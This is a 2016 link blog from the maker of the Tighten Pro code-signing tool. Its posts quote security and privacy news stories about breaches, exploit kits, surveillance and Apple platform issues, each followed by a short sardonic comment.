Links...
 
Tighten Pro
C/C++/Cocoa tool for codesign security, Developer ID, & Mac App Store Receipt Validation

Tighten Pro - in the Mac App Store

Tighten Pro is now available in the Mac App Store. Simply click on the icon to the left to purchase directly from Apple. Or choose PKCS#7Viewer.app by clicking the image to the right.

4.29.2016
Mac Developer: In a first, US military plans to drop “cyberbombs” on ISIS, NYT says | Ars Technica

In a first, US military plans to drop “cyberbombs” on ISIS, NYT says | Ars TechnicaOpening a new front in its campaign to defeat Islamic State terrorists, the US military has for the first time directed its Cyber Command to mount hacking attacks against ISIS computers and networks, The New York Times reported Sunday.
This may lead to a sadly unexpected escalation that affects many ordinary people.

Labels:

By : Tighten In a first, US military plans to drop “cyberbombs” on ISIS, NYT says | Ars Technica 0 comments

4.28.2016
Mac Developer: Blame the victim: Report shows fifth of breaches caused by “miscellaneous errors” | Ars Technica

Blame the victim: Report shows fifth of breaches caused by “miscellaneous errors” | Ars TechnicaIn cases where malware or hacking was used to get in the door, "zero day" vulnerabilities played a microscopic role. The vast majority of breaches involving exploiting bugs in software went after known vulnerabilities—and just 10 vulnerabilities accounted for 85 percent of exploit attacks (though the list of top vulnerabilities has been called into question by some observers).
Social hacking has always been dominant. Probably, if someone was good enough to gain access to your systems through a zero-day exploit, you wouldn't know about it, unless they were using a purchased toolkit written by someone else.

Labels: ,

By : Tighten Blame the victim: Report shows fifth of breaches caused by “miscellaneous errors” | Ars Technica 0 comments

4.27.2016
Mac Developer: 7 million unsalted MD5 passwords leaked by Minecraft community Lifeboat | Ars Technica

7 million unsalted MD5 passwords leaked by Minecraft community Lifeboat | Ars Technica: "E-mail addresses and hashed passwords for 7 million Lifeboat accounts. The mass compromise was discovered by Troy Hunt, the security researcher behind the Have I been pwned? breach notification site. Hunt said he had acquired the data from someone actively involved in trading hacked login credentials who has provided similar data in the past."
Have you been owned? Yes, in fact, you have.

Labels:

By : Tighten 7 million unsalted MD5 passwords leaked by Minecraft community Lifeboat | Ars Technica 0 comments

Mac Developer: Boffins believe buggy Binder embiggens Android attack surface • The Register

Boffins believe buggy Binder embiggens Android attack surface • The RegisterThe paper notes that “private APIs” in Android – APIs that aren't documented for third-party developers – are a security problem. Since they're unknown, they don't get checked or tested.

Another architectural issue the paper cites is that de-serialisation is “assumed to be always undisturbed”, another assumption that depends on the validity of the client-side transaction.
Reminiscent of the XPC exploit that could be used to root Apple devices. Security "features"

Labels:

By : Tighten Boffins believe buggy Binder embiggens Android attack surface • The Register 0 comments

Mac Developer: Hacking group “PLATINUM” used Windows’ own patching system against it | Ars Technica

Hacking group “PLATINUM” used Windows’ own patching system against it | Ars TechnicaIn 2006, Alex Sotirov gave a presentation at Black Hat that briefly described how Windows' hotpatching worked in the context of a description of how third parties had offered some quick patches for Windows flaws while waiting for Microsoft's official fixes. A more thorough description was given by Alex Ionescu at SyScan 2013. Ionescu's talk wasn't just about how hotpatching was implemented, but described ways that attackers could use it to modify running systems to inject malware without having to write the malware to disk or inject DLLs, both of which are visible to anti-malware software and humans alike.
The joys of a monoculture. It's like a petri dish where microbes flourish.

Labels: ,

By : Tighten Hacking group “PLATINUM” used Windows’ own patching system against it | Ars Technica 0 comments

4.25.2016
Mac Developer: Billion dollar Bangladesh hack: SWIFT software hacked, no firewalls, $10 switches | Ars Technica

Billion dollar Bangladesh hack: SWIFT software hacked, no firewalls, $10 switches | Ars Technica: "Billion dollar Bangladesh hack: SWIFT software hacked, no firewalls, $10 switches

The Bangladesh central bank had no firewall and was using a second-hand $10 network when it was hacked earlier this year. Investigation by British defense contractor BAE Systems has also shown that the SWIFT software used to make payments was compromised, enabling the hackers to send money around the world without leaving any trace in Bangladesh."
No commentary required.

Labels: ,

By : Tighten Billion dollar Bangladesh hack: SWIFT software hacked, no firewalls, $10 switches | Ars Technica 0 comments

Mac Developer: Exploit gets around Windows' app security safeguards

Exploit gets around Windows' app security safeguards
Researcher Casey Smith has discovered a vulnerability in Windows that gets around this barrier. If you tell Regsvr32 to point to a remotely hosted file (such as a script), you can make a system run whichever app you want -- just what hackers and virus writers are looking for.
I leak, you leak, we all leak together.

Labels: , ,

By : Tighten Exploit gets around Windows' app security safeguards 0 comments

4.24.2016
Mac Developer: EtherPEG

EtherPEGEtherPEG works by capturing unencrypted TCP packets off your local network, collecting packets into groups based on TCP connection (determined from source IP address, destination IP address, source TCP port and destination TCP port), reassembling those packets into order based on TCP sequence number, and then scanning the resulting data for byte sequences that suggest the presence of JPEG or GIF data.
Some familiar characters and their mischief.

Labels:

By : Tighten EtherPEG 0 comments

Mac Developer: Managing Subscriptions with In-App Purchase - WWDC 2012 - Videos - Apple Developer

Managing Subscriptions with In-App Purchase - WWDC 2012 - Videos - Apple Developer
An oldie, but goodie.

Labels:

By : Tighten Managing Subscriptions with In-App Purchase - WWDC 2012 - Videos - Apple Developer 0 comments

Mac Developer: Facebook was the victim of a backdoor hack

Facebook was the victim of a backdoor hackDevcore's Orange Tsai recently discovered that someone had installed a backdoor on one of Facebook's corporate servers (that is, not the social network itself) in a bid to swipe workers' login details.
And what are mere mortals to do?

Labels:

By : Tighten Facebook was the victim of a backdoor hack 0 comments

4.23.2016
Mac Developer: Congress asks the NSA how often it spies on Americans

Congress asks the NSA how often it spies on AmericansThanks in part to leaks, it's no secret that the National Security Agency's foreign intelligence gathering also covers some Americans. But just how many Americans are under watch, and how many are simply innocents caught in the crossfire? Congress wants to find out. The House Judiciary Committee has sent a letter giving Director of National Intelligence James Clapper until May 6th to provide a "rough estimate" of how many Americans are swept up in spying under the Foreign Intelligence Surveillance Act.
Wild Bill Lawless, as sheriff of these parts, I give you just 27 years to get outta town.

Labels:

By : Tighten Congress asks the NSA how often it spies on Americans 0 comments

4.22.2016
Mac Developer: “Nuclear” exploit kit service cashes in on demand from cryptoransomware rings | Ars Technica

“Nuclear” exploit kit service cashes in on demand from cryptoransomware rings | Ars Technica: "Security researchers at Cisco Talos and Check Point have published reports detailing the inner workings of Nuclear, an 'exploit kit' Web service that deployed malware onto victims' computers through malicious websites. While a significant percentage of Nuclear's infrastructure has been recently disrupted, the exploit kit is still operating—and looks to be a major contributor to the current crypto-ransomware epidemic."
Somehow, after I deleted it, Flash was on my machine again.

Labels:

By : Tighten “Nuclear” exploit kit service cashes in on demand from cryptoransomware rings | Ars Technica 0 comments

Mac Developer: Brazen no more, makers of account-draining bank trojan get 24 years | Ars Technica

Brazen no more, makers of account-draining bank trojan get 24 years | Ars TechnicaAlso providing assistance were researchers from Microsoft’s Digital Crimes Unit, Flashpoint, PhishLabs, Dell SecureWorks, Damballa, and the Norwegian Security Research Team known as "Underworld.no." The arrests came as both men brazenly traveled through places subject to US law-enforcement extradition.
Nice.

Labels:

By : Tighten Brazen no more, makers of account-draining bank trojan get 24 years | Ars Technica 0 comments

Mac Developer: National Security Letters are now constitutional, judge rules | Ars Technica

National Security Letters are now constitutional, judge rules | Ars TechnicaThe legal challenge Illston decided stemmed from a challenge brought by the Electronic Frontier Foundation, which was representing two service providers that challenged the NSLs on grounds that the gag requirement illegally limited their rights of speech.
A fight with no winners, only losers.

Labels:

By : Tighten National Security Letters are now constitutional, judge rules | Ars Technica 0 comments

4.21.2016
Mac Developer: UK intel agencies spy indiscriminately on millions of innocent folks | Ars Technica

UK intel agencies spy indiscriminately on millions of innocent folks | Ars Technica: "The UK's intelligence agencies (MI5, MI6, and GCHQ) are spying on everything you do, and with only the flimsiest of safeguards in place to prevent abuse, according to more than a thousand pages of documents published today as a result of a lawsuit filed by Privacy International."
They know who you liked on Facebook.

Labels: ,

By : Tighten UK intel agencies spy indiscriminately on millions of innocent folks | Ars Technica 0 comments

4.20.2016
Mac Developer: DRAM bitflipping exploits that hijack computers just got easier | Ars Technica

DRAM bitflipping exploits that hijack computers just got easier | Ars Technica: "New research into the 'Rowhammer' bug that resides in certain types of DDR memory chips raises a troubling new prospect: attacks that use Web applications or booby-trapped videos and documents to trigger so-called bitflipping exploits that allow hackers to take control of vulnerable computers."
Hard to imagine building defences against bugs in the actual hardware.

Labels:

By : Tighten DRAM bitflipping exploits that hijack computers just got easier | Ars Technica 0 comments

Mac Developer: Apple-backed coalition opposes Burr-Feinstein encryption bill in open letter

Apple-backed coalition opposes Burr-Feinstein encryption bill in open letter: "A group of four tech industry associations — representing businesses like Apple, Amazon, Microsoft and Google — have published an open letter opposing a draft bill by U.S. Senators Richard Burr and Dianne Feinstein, which would make it possible for courts to order help bypassing encryption."
It may well be that we need an entire generation of legislators to die off before we get the laws that are informed by people who understand what is going on.

Labels:

By : Tighten Apple-backed coalition opposes Burr-Feinstein encryption bill in open letter 0 comments

4.19.2016
Mac Developer: How hackers eavesdropped on a US Congressman using only his phone number | Ars Technica

How hackers eavesdropped on a US Congressman using only his phone number | Ars TechnicaA US Congressman has learned first-hand just how vulnerable cellphones are to eavesdropping and geographic tracking after hackers were able to record his calls and monitor his movements using nothing more than the public ten-digit phone number associated with the handset he used.
Just when you thought it was safe to go back in the pool.

Labels:

By : Tighten How hackers eavesdropped on a US Congressman using only his phone number | Ars Technica 0 comments

Mac Developer: How Hacking Team got hacked | Ars Technica

How Hacking Team got hacked | Ars TechnicaOn Friday, the self-described black hat hacker who claimed responsibility for the Hacking Team dump last year, and who goes by the handle "Phineas Phisher," published the technical details of how he pulled off the caper—and encouraged others to follow his example.
It's like one guy doing the actual work that the NSA was tasked with.

Labels: ,

By : Tighten How Hacking Team got hacked | Ars Technica 0 comments

4.18.2016
Mac Developer: Apple confirms QuickTime for Windows at end of life

Apple confirms QuickTime for Windows at end of life: "Last week software security outfit Trend Micro disclosed the discovery of two new flaws in QuickTime 7 for Windows, saying Apple was informed of the security threats in November. At the time, Apple said it had no plans to issue a patch, adding the software 'would be deprecated on Windows and the vendor would publish removal instructions for users.'
iTunes is, of course, everything that QuickTime(tm) was, and aspired to be.

Labels:

By : Tighten Apple confirms QuickTime for Windows at end of life 0 comments

Mac Developer: Flashback: Declassified 1970 DOD cybersecurity document still relevant | Ars Technica

Flashback: Declassified 1970 DOD cybersecurity document still relevant | Ars Technica: "The National Security Archives at George Washington University has just added a classic text of computer security to its 'Cyber Vault' project—the original version of what came to be known as the 'Ware Report,' a document published by the predecessor to the Defense Advanced Research Projects Agency in February 1970. And as much as technology has changed in the 46 years that have passed, the Ware Report would still hold up pretty well today with a few notable edits.
We knew exactly what needs to be done but were still unable to do it because it is possibly an unsolvable problem.

Labels:

By : Tighten Flashback: Declassified 1970 DOD cybersecurity document still relevant | Ars Technica 0 comments

Mac Developer: House votes to undermine net neutrality rules, and ISPs cheer | Ars Technica

House votes to undermine net neutrality rules, and ISPs cheer | Ars TechnicaThe "No Rate Regulation of Broadband Internet Access Act" was ostensibly proposed to prevent the FCC from setting the rates charged by Internet providers. But the bill defines "rate regulation" so broadly that FCC Chairman Tom Wheeler says it could prevent the commission from enforcing net neutrality rules against blocking and throttling.
Soon, the USA will be the most technologically-backwards country in the world when it comes to connectivity. Google Fiber notwithstanding.

Labels:

By : Tighten House votes to undermine net neutrality rules, and ISPs cheer | Ars Technica 0 comments

4.16.2016
Mac Developer: Out-of-date apps put 3 million servers at risk of crypto ransomware infections | Ars Technica

Out-of-date apps put 3 million servers at risk of crypto ransomware infections | Ars Technica: "More than 3 million Internet-accessible servers are at risk of being infected with crypto ransomware because they're running vulnerable software, including out-of-date versions of Red Hat's JBoss enterprise application, researchers from Cisco Systems said Friday."
The joys of monoculture, the ideal petri dish for the epidemic disaster.

Labels:

By : Tighten Out-of-date apps put 3 million servers at risk of crypto ransomware infections | Ars Technica 0 comments

4.14.2016
Mac Developer: QuickTime Sandbox Fail

This looks like a security scoped URL fail. When the sandbox is so restrictive even Apple can't figure out how to make it work.

QuickTimeFail

Labels:

By : Tighten QuickTime Sandbox Fail 0 comments

Mac Developer: Apple investigating major App Store search changes, mulling paid results, report says

Apple investigating major App Store search changes, mulling paid results, report says: "A report Thursday claims Apple has a 'secret team' working on major user-facing changes to App Store search results, including the possibility of charging developers to promote content. "
I'm looking forward to seeing the Microsoft brand at the top of every search category on the App Store(s). If Google isn't already the way you find relevant content in the App Store, it soon will be.

Labels:

By : Tighten Apple investigating major App Store search changes, mulling paid results, report says 0 comments

4.13.2016
Mac Developer: '1970' date bug could be used to wreck pre-iOS 9.3.1 devices over Wi-Fi, researchers say

'1970' date bug could be used to wreck pre-iOS 9.3.1 devices over Wi-Fi, researchers say: "If an iOS device is set to connect to a trusted Wi-Fi network automatically — such as a cable company's free hotspot — a hacker mimicking that network's name can trick a device into setting the wrong time, said Patrick Kelley and Matt Harrigan, cited by Krebs on Security. This is possible because iOS regularly tries to connect to an NTP (network time protocol) server to keep time in sync."
Think of all those wasted hours trying to get useful code running in a sandbox environment. To what end?

Labels: ,

By : Tighten '1970' date bug could be used to wreck pre-iOS 9.3.1 devices over Wi-Fi, researchers say 0 comments

Mac Developer: How to install and run Mac apps that don't come from the Mac App Store

How to install and run Mac apps that don't come from the Mac App Store: "Apple has introduced a number of features designed to protect users from malware in OS X, but these tools occasionally go too far when trying to save people from themselves."
Well, as long as the Mac can run really crappy ports of iPad shovel ware, why should anybody complain?

Labels:

By : Tighten How to install and run Mac apps that don't come from the Mac App Store 0 comments

 

 
 
 

 Tighten    
 Generate    
 Secure    
 Inspect    
 Quarantino    
 Downloads    
 Support    
 Documentation    
 Tighten App.app    
 Tighten Pro.app    
 PKCS#7Viewer.app    
 About    
 Hire    
 Contact    
 Blogger    
 FaceBook    
 iTunes Direct Link    
 Hollywood CA    
 spctl --assess -vvv    
 spctl --master-enable    
 spctl --master-disable    
 Mac App Store Receipt Validation    
 Apple Code Signing Certificates    
 Gatekeeper Developer ID Apple    
 Xcode codesign tutorial    
 [Site Map]    
 


Copyright © 2005-2015
All Rights Reserved
Tighten Pro